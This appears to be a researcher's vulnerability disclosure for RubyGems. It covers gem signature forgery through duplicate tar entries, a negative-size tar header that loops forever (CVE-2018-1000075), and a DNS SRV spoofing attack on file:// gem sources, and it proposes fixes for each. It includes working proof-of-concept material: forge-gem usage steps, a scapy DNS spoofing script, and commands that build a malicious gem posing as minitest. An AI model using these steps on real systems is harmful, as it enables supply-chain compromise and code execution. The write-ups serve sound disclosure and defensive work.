The essential mitigation is to ensure that there is no ambiguity when processing a tar file that has multiple entries for the same file name. E.g., "data.tar.gz" must refer to one and only one entry in the tar file. One way to do it would be to set a policy in the code: e.g., last entry always wins (which would be consistent with
the tar
command).
But that would be hard to enforce, especially in new code going forward.
Another way would be not to permit duplicate entries; e.g.,
verify_entry
could check whenever it is about to overwrite something in
@signatures
, @digests
, or @spec
, and return an error.
This needs some care, as metadata and metadata.gz are both processed equivalently. It is possible, using symlinks, to create entries that effectively point to the same file, even though the paths differ; e.g.:
data.tar.gz
dir/ -> ..
dir/data.tar.gz
But this shouldn't be a problem for gem
,
as long as it continues to use strict string equality with unadorned paths like
"data.tar.gz"
.
Even when this bug is fixed, a weaker form of signature forgery is possible. There is nothing in a gem file that binds data.tar.gz and metadata.gz together: they are signed independently. It is possible to mix and match files from different signed gems. Suppose a signed gem example-1.0 has a security vulnerability, and the authors release a new signed update example-1.1. Someone (perhaps a malicious rubygems.org admin) could forge a gem containing data.tar.gz from example-1.0 and metadata.gz from example-1.1. Users would think they are running the updated code, but they are still running the old vulnerable code. Fixing this weaker form of forgery seems like it would require a redesign of the signature format. Ideally, the signature would be over the entire gem, and verified before any unpacking.
It seems that not many people sign their gems or verify signatures. For most users the possibility of signature forgery doesn't put them at additional risk beyond the (already risky) status quo. The flaw affects only those users who use the MediumSecurity
or HighSecurity
profiles.
How to run forge-gem.sh:
$ gem fetch multi_json
$ mkdir orig
$ mv multi_json-1.12.2.gem orig/
$ echo hacked > HACKED
$ tar czf data.tar.gz HACKED
$ ./forge-gem.sh orig/multi_json-1.12.2.gem data.tar.gz forged.gem
Be aware that if the original multi_json-1.12.2.gem and the new forged.gem are both in the same directory, then gem install ./forged.gem
will—for some reason—install multi_json-1.12.2.gem instead. You have to hide the original file in another directory first.
The bug was a parsing bug that allowed certain fields in tar files to be negative or have other weird formats, a consequence of which was that you could make some commands go into an infinite loop. This vulnerability was assigned CVE-2018-1000075. The commit 92e98bf8f8 that fixed this bug shipped in RubyGems 2.7.6.
Because Ruby doesn't have a tar package in the standard library,
a lot of other Ruby software imports Gem::Package::TarReader
in order to use RubyGems' tar-handling code
(as recommended
here,
here, and
here,
for example).
So in practice, the code is used on generic tar files,
not just specially formatted gem files.
Fixing the infinite-loop bug
caused a problem
for someone who was trying to parse a different flavor of tar files;
presumably past versions of RubyGems silently
returned garbage for certain fields in such formats,
rather than signaling an error.
The minitar library was also vulnerable.
The attached file loop.gem causes an infinite loop in any command that tries to iterate over the entries in the tar container.
gem install loop.gem
gem unpack loop.gem
gem specification loop.gem
Gem::Package::TarHeader.from uses oct to parse fields in the tar header.
oct does more than just parse octal digits; for example, it permits these unexpected syntaxes:
"+012345".oct # 5349
"-012345".oct # -5349
"0x12abc".oct # 76476
"0b10000".oct # 16
"123,456".oct # 83
"nothing".oct # 0
The ability to encode negative values enables a DoS (infinite loop) in the tar reader.
The proof-of-concept loop.gem has a size field of -0000001000\x00, or −512.
The negative size causes Gem::Package::TarReader.each to seek backwards after reading the header, so it reads the same header over and over.
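The loop can be modeled in a few lines. This is a simplified sketch, not the RubyGems source: fake_header and header_offsets are hypothetical helpers, only the size field (offset 124, 12 bytes in the standard tar header layout) is filled in, and the iteration count is capped so that the example terminates.

```ruby
require "stringio"

BLOCK = 512

# Build a 512-byte block in which only the size field is set.
def fake_header(size_field)
  header = "\0".b * BLOCK
  header[124, 12] = size_field.ljust(12, "\0").b
  header
end

# Simplified model of iterating over entries: read a header, then skip
# over the entry body by seeking forward by the parsed size.
def header_offsets(io, max_iterations: 5)
  offsets = []
  max_iterations.times do
    break if io.eof?
    offsets << io.pos
    header = io.read(BLOCK)
    size = header[124, 12].delete("\0").oct  # lenient parse, accepts a sign
    io.seek(size, IO::SEEK_CUR)              # a negative size seeks backwards
  end
  offsets
end

archive = fake_header("-0000001000") + "\0".b * BLOCK
offsets = header_offsets(StringIO.new(archive))
puts offsets.inspect  # every iteration starts at the same offset
```

Without the iteration cap, the reader would never advance past the first header.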
I suppose one could cause a lot of CPU usage on the rubygems.org server by uploading copies of loop.gem, but I didn't try it.
Instead of doing the conversion using oct, there could be a special-purpose function that validates its input better.
It might be enough to check that the string matches /\A[0-7]+\z/ before calling oct.
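A minimal sketch of such a check follows. The name strict_oct is chosen here for illustration, and stripping trailing NUL and space padding before matching is an assumption about how the field reaches the parser; neither is taken from the RubyGems source.

```ruby
# Hypothetical helper: parse a tar header field as octal, rejecting
# anything other than a plain run of octal digits.
def strict_oct(field)
  digits = field.sub(/[\x00 ]+\z/, "")  # assumed padding: trailing NULs/spaces
  unless digits.match?(/\A[0-7]+\z/)
    raise ArgumentError, "#{field.inspect} is not an octal number"
  end
  digits.oct
end

puts strict_oct("0000001000\0")

["-0000001000\0", "+012345", "0x12abc", "0b10000", "123,456", "nothing"].each do |bad|
  begin
    strict_oct(bad)
  rescue ArgumentError => e
    puts "rejected: #{e.message}"
  end
end
```

Raising an error instead of returning 0 for unparseable input is a design choice: it makes malformed archives fail loudly, at the cost of rejecting tar variants that encode these fields differently.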
The attached patch file
adds a test that Gem::Package::TarHeader.from
rejects various bogus syntax.
RubyGems's DNS SRV lookup feature was questionable from a security perspective, but we did not find an actual working exploit for http and https sources, nor for s3 sources. However, for file:// sources, I did find an exploit, though it only works under a narrow set of conditions.
SRV lookups were removed in October 2018, eliminating this whole class of potential vulnerabilities.
This report was awarded a $500 bounty.
gem
makes a DNS SRV query for each of its configured sources;
the response is allowed to override the source URL in certain ways.
The SRV query happens not only for http:// and https:// sources, but also for s3:// and file://.
In the case of file://, the SRV response may add a prefix to the local filesystem path from which gems are fetched.
As a consequence, an attacker who can provide or spoof DNS responses, and can write to the local filesystem, may cause a victim to download fake gems with arbitrary contents.
Here is how an attacker may hijack a victim's installation of the minitest
gem.
The users attacker
and victim
share the same local filesystem.
victim
expects to install gems from /home/victim/trusted-gem-path,
but attacker
will force the installation to be from /tmp/attack/home/victim/trusted-gem-path instead.
First, victim
sets up a file:// repo. This could also be done by some other party, like a local administrator.
victim$ mkdir -p /home/victim/trusted-gem-path/gems
victim$ (cd /home/victim/trusted-gem-path/gems && gem fetch --clear-sources --source https://rubygems.org/ minitest)
victim$ gem generate_index -d /home/victim/trusted-gem-path
Then attacker
makes a malicious gem file
and installs it under a prefix where attacker
can write and victim
can read.
We'll use /tmp/attack.
# Make a malicious gem
attacker$ mkdir lib
attacker$ echo 'puts "hacked"' > lib/hacked.rb
attacker$ cat <<EOF > hacked.gemspec
Gem::Specification.new do |s|
  s.name = 'minitest'
  s.version = '5.11.3'
  s.files = ['lib/hacked.rb']
end
EOF
attacker$ gem build --force hacked.gemspec
# Make it available under /tmp/attack
attacker$ mkdir -p /tmp/attack/home/victim/trusted-gem-path/gems
attacker$ cp minitest-5.11.3.gem /tmp/attack/home/victim/trusted-gem-path/gems
attacker$ gem generate_index -d /tmp/attack/home/victim/trusted-gem-path
Next, attacker
runs a program to spoof SRV responses.
This will require root privileges if run on the same host, but it could also be done from another host in the same local network.
The attacker may even control the local DNS, for example by being the wi-fi admin.
#!/usr/bin/env python3

from scapy.all import *

TARGET = b"xxx./tmp/attack"

def respond(pkt):
    if not (DNS in pkt and pkt[DNS].opcode == 0 and pkt[DNS].ancount == 0):
        return
    q = pkt[DNSQR]
    # Nothing after "_rubygems._tcp." indicates that the host is empty;
    # i.e., that it's likely a lookup for a file:// URL. 33 == SRV.
    if not (q.qname == b"_rubygems._tcp." and q.qtype == 33):
        return
    resp = IP(src=pkt[IP].dst, dst=pkt[IP].src) \
        / UDP(sport=pkt[UDP].dport, dport=pkt[UDP].sport) \
        / DNS(qr=1, id=pkt[DNS].id, qd=q, ancount=1) \
        / DNSRRSRV(type=33, rrname=q.qname, ttl=30, priority=0, weight=1, port=80, rdlen=8+len(TARGET), target=TARGET)
    send(resp)

sniff(filter="udp dst port 53", prn=respond)
Finally, victim tries to fetch a gem and specifically asks for their previously configured file:// source.
attacker's SRV response adds a /tmp/attack prefix, and victim ends up with a malicious gem.
victim$ gem fetch --clear-sources --source file:///home/victim/trusted-gem-path minitest
victim$ tar -O -xf minitest-5.11.3.gem -- data.tar.gz | tar tzf -
lib/hacked.rb
The api_endpoint function takes a URL, extracts the host component,
and then issues a SRV query for _rubygems._tcp.#{host}.
Its usual purpose is to replace "rubygems.org" with "api.rubygems.org" in http:// and https:// URLs;
but it is also called for s3:// and file:// URLs.
In a typical file:// URL, the host component is empty,
so the query will be for "_rubygems._tcp." with nothing after the final dot.
api_endpoint has the property that
it allows limited control of parts of the URL other than the host component:
in particular, you can add a prefix to the path component by including "/" characters in the SRV response.
The attack works by sending a SRV response of xxx./tmp/attack.
The "xxx." part can be anything, as long as it ends with a "." in order to pass the subdomain check.
Receiving such a response, api_endpoint transforms the input URL
file:///home/victim/trusted-gem-path
into the output URL
file://xxx./tmp/attack/home/victim/trusted-gem-path
In the output URL, the "xxx." is technically the host component,
but it doesn't matter because it is ignored.
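The rewriting step can be modeled as plain string assembly. The sketch below is not the RubyGems source: rewrite_source is a hypothetical name, the SRV answer is passed in as a string rather than looked up in DNS, and the subdomain check is left out entirely.

```ruby
require "uri"

# Hypothetical model: rebuild the URL from the original scheme, the SRV
# target, and the original path. The DNS lookup and the subdomain check
# performed by the real code are omitted.
def rewrite_source(source, srv_target)
  uri = URI.parse(source)
  "#{uri.scheme}://#{srv_target}#{uri.path}"
end

rewritten = rewrite_source("file:///home/victim/trusted-gem-path", "xxx./tmp/attack")
puts rewritten

# Re-parsing shows that the slashes in the SRV target landed in the path.
parsed = URI.parse(rewritten)
puts "host: #{parsed.host.inspect}"
puts "path: #{parsed.path.inspect}"
```

Because the target is spliced in front of the path without validation, anything after the first "/" in the SRV answer becomes a path prefix.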
The conditions for exploitation seem fairly narrow,
and I don't know how common such conditions are.
While gem
supports file:// sources,
I wasn't able to find much information on configuring them other than
one bug report.
It seems it's more common to do a
shared repository over http
than using a shared filesystem.
Commit
37d486cfd9
says "bundler gemspecs use file:// URIs for their sources," but I could not find in Bundler where that happens.
The best solution seems to be not to call api_endpoint
for file:// (and s3://) URLs.
The host component of such URLs doesn't have the same meaning as it does in http:// and https:// URLs.
A mitigation that would be sufficient in this case is to apply stricter validation of SRV responses, so that they cannot modify any component other than the host (GitHub #2035, HackerOne #274267).
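Both ideas can be sketched as small predicates. These are hypothetical helpers written for illustration, not the change that RubyGems made: srv_lookup_allowed? restricts lookups to http and https sources, and host_only_target? accepts an SRV target only if it consists of hostname characters.

```ruby
require "uri"

SRV_SCHEMES   = %w[http https].freeze
HOSTNAME_ONLY = /\A[A-Za-z0-9.-]+\z/

# Only http:// and https:// sources get an SRV lookup at all.
def srv_lookup_allowed?(source)
  SRV_SCHEMES.include?(URI.parse(source).scheme)
end

# An SRV target may contain hostname characters only, so it cannot
# introduce "/" and thereby change the path component.
def host_only_target?(target)
  target.match?(HOSTNAME_ONLY)
end

puts srv_lookup_allowed?("file:///home/victim/trusted-gem-path")
puts srv_lookup_allowed?("https://rubygems.org/")
puts host_only_target?("xxx./tmp/attack")
puts host_only_target?("api.rubygems.org")
```

Either check alone would stop the file:// attack described above; applying both is a defense in depth.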
The CVSS calculator says the severity is "high" but I would put it at "low" because of the difficulty of execution. The impact is indeed bad: arbitrary code execution using the victim's privileges, whether through Ruby code or a C extension. But as far as I can tell, the conditions for exploitation are uncommon.